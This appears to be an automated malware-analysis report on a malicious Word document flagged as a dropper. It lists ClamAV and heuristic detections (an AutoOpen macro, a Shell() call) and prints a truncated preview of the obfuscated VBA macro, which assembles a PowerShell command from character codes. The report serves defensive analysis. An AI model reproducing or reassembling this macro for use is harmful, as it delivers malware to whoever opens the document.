MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, a critical indicator of execution, and is flagged as an auto-executing macro (AutoOpen). This suggests the macro is designed to run automatically upon opening the document, likely to download and execute a secondary payload. The ClamAV detection name further supports its classification as a dropper.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6593935-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6593935-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11755 bytes |
SHA-256: 951e9e5fd222b2d7dfc26f46fe87f34b1caab5ec98488a425309b408e5ed32ea |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "sdzLunq" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "iaIGkiYfwwkP" Function JCzRcqtY() On Error Resume Next QUToD = ChrB(39057 + _ Sin(hEMRV * CLng(hVpEh + 61166) _ + 55673 _ + ChuspS)) RKOzr _ = 13895 + Atn(48279) / 86898 / _ Round(94811) / 62616 / CInt(wwaOp) rYcWm = "hell " + " " + " " + " " + " " + " " + "& " + Chr(40) + Chr(40) + "vaR" + "Iable" + " '*M" + "dr*'" + Chr(41) + "." + "nAme[3," + "11,2" jLwoO _ = 67583 + Atn(17702) / 16196 / _ Round(72240) / 44775 / CInt(qwPmu) YhwvH = ChrB(84923 + _ Sin(iMkOmZ * CLng(OBABtO + 56221) _ + 12769 _ + YNDhUp)) lZhUcZHIIwl = "]-joIn''" + Chr(41) + " " + Chr(40) + " -jOi" + "N" + Chr(40) + " " + Chr(40) + "35 ," + " 111 ,87," + "112 , " + "58, " + "105, 98," + "112,42 ," + "104,101" + ", 10" + "9, 9" PPnnUH _ = 38414 + Atn(40969) / 48567 / _ Round(37599) / 12890 / CInt(BwuVM) zovOtj = ChrB(57516 + _ Sin(BaiDK * CLng(tjUwz + 73615) _ + 54529 _ + hfbZH)) DrGqBR = "8 , 1" + "00, 115 " + ", 39 " + ", 73, 9" + "8 ,115" + " ,41 " + ", 80" + " ,98 ," + " 101 ," + "68, 107, " + "110 , 98" + ",105" Ehdrr _ = 12703 + Atn(39746) / 1408 / _ Round(69858) / 2247 / CInt(HJCFt) VIiMVi = ChrB(92504 + _ Sin(ZwsHQ * CLng(UYGMUw + 82770) _ + 23280 _ + DswTd)) JBPvPOuS = " , 115,60" + ",35 " + ", 73 " + ",112 , 10" + "8,58" + " ,32 " + ",111, 1" + "15, 11" + "5 , 1" + "19,61,4" + "0 , 40," dZBnsG _ = 32120 + Atn(47418) / 20061 / _ Round(69048) / 5889 / CInt(VRIbtU) BiCql = ChrB(93806 + _ Sin(JEfUYK * CLng(iwYrT + 45115) _ + 61259 _ + AwcRP)) rkUipDikPb = " 112, 1" + "12, " + "112, 41" + ",101 ,1" + "02 ,115 ," + "111, 104 " + ",97 , " + "97 , 41" + " ,117 " + ", 114 " + ", 40 ," uvbzc _ = 9055 + Atn(53660) / 18587 / _ Round(51022) / 68736 / CInt(rzwLt) LsOrUj = ChrB(69774 + _ Sin(wjziGN * CLng(haPIE + 40956) _ + 93580 _ + qUWob)) fVlQwv = " 95, 9" + "7 , " + "109 , " + "62,79 , 4" + "0 , 71 , " + "111, 115" + " ,115" airGGR _ = 48032 + Atn(1589) / 58395 / _ Round(49213) / 24216 / CInt(ZfVibU) wJXhD = ChrB(78968 + _ Sin(OmXWw * CLng(IzWAGb + 275) _ + 92028 _ + jvpwNw)) zXTMdsuOfw = ", 119" + ",61,40 ," + " 40,112 ," + "112 ,112," + "41, 116 ," + "115, " + "102,96, 1" + "10 ,1" + "05 , " + "96,41 ," + "106, 1" + "10 ,100, " kMtCS _ = 60405 + Atn(35679) / 6259 / _ Round(2194) / 77472 / CInt(lDmdH) SibJVX = ChrB(99667 + _ Sin(aBdbs * CLng(cYzCK + 57542) _ + 93283 _ + dfSwSJ)) SWbAziF = "111,102 " + ", 98 ,10" + "7 , 119" + " ,98" + " , 102 " + ",100 , " + "111 , 98 " sIDoO _ = 57681 + Atn(58766) / 40373 / _ Round(14765) / 28225 / CInt(thsdpb) hpMFj = ChrB(35277 + _ Sin(iqFwqW * CLng(qFhtZ + 75315) _ + 57547 _ + zDpnVk)) iFPtddWtulG = ",126 , " + "41,10" + "0 , 10" + "4 ,1" + "06 ,4" + "1,102" + ",114, 40" + ",93, 1" + "00 ,81 " + ",100" JCzRcqtY = rYcWm + lZhUcZHIIwl + DrGqBR + JBPvPOuS + rkUipDikPb + fVlQwv + zXTMdsuOfw + SWbAziF + iFPtddWtulG jzprq _ = 70932 + Atn(37960) / 3776 / _ Round(74669) / 47403 / CInt(KjnZYR) jDcKkP = ChrB(78172 + _ Sin(EsJQvw * CLng(PGFGzj + 39908) _ + 43269 _ + uUocu)) End Function Function wLdZqqAvN() On Error Resume Next YiYvmh _ = 72922 + Atn(48518) / 28617 / _ Round(50622) / 4859 / CInt(jbsWc) STjTSS = ChrB(22656 + _ Sin(jZPPa * CLng(kOUir + 372) _ + 20601 _ + ihrfw)) OowzN = ",40,71" + " ,111" + ", 115," + "115,119 " + ",61 ," + "40 ," + "40,111 ,1" nvKYr _ = 886 + Atn(19814) / 50133 / _ Round(16429) / 9551 / CInt(GjXBM) wzqaS = ChrB(13774 + _ Sin(icdGp * CLng(cmVqal + 28075) _ + 82907 _ + aCKGP)) YkHOw = "04 ,114 " + ", 117,10" + "7 ,1" + "10 , 1" + "02 , 119" + ", 119, 4" lQnJR _ = 45572 + Atn(84813) / 62281 / _ Round(12460) / 89449 / CInt(owtPW) kJcZk = ChrB(86860 + _ Sin(PwSaZo * CLng(MrvtM + 80983) _ + 94292 _ + bkGOw)) CONNhZ = "1 ,100 ," + " 104, 10" + "6, 4" + ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.